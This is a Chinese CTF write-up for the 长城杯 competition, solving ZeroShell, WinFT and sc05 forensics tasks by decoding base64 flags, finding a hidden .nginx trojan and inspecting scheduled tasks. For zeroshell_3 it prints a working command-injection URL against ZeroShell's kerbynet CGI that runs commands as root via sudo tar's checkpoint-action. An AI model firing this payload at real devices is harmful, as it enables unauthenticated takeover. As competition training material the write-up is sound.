长城杯

长城杯

zeroshell_1

flag的base64是ZmxhZw==查找字符串Zmxh

img

http.referer == "ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9"

解码得到flag

zeroshell_2

上网搜到zeroshell POC,以及明文的管理员账号密码(流量包里也有)

image-20241216160643456

直接查看flag文件就行(或者虚拟机里 cat /flag)img

zeroshell_3

查看主机的外联服务器的所有TCP,UDP,IP和进程使用

payload打

http://61.139.2.100//cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec='netstat%20-ano%20'%0A'

或者虚拟机找

netstat -ano

img

zeroshell_4

木马常见于/tmp目录下,尝试提交隐藏文件 最终发现是.nginx文件img

zeroshell_5

wget下载文件 用ida分析得到密钥img

img

WinFT_1

打开火绒剑->网络 看到爆红文件 拖到微步云沙箱检测

img将fluv文件后面的ip填上 得到完整的flag

img

WinFT_2

找到任务计划书 得到base64 解码

img

img

WinFT_5

流量包里找到flag.txt提取压缩包,解码压缩包末尾的base64得到压缩包密码

image-20241216172337773

解压缩得到flag

image-20241216172423193

sc05_1

根据提示 查找对应ip的请求时间 img

转换格式到大写md5 就是flag

img

posted @   Yolololololo  阅读(29)  评论(0编辑  收藏  举报
(评论功能已被禁用)
相关博文:
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 上周热点回顾(3.3-3.9)
· AI 智能体引爆开源社区「GitHub 热点速览」
点击右上角即可分享
微信分享提示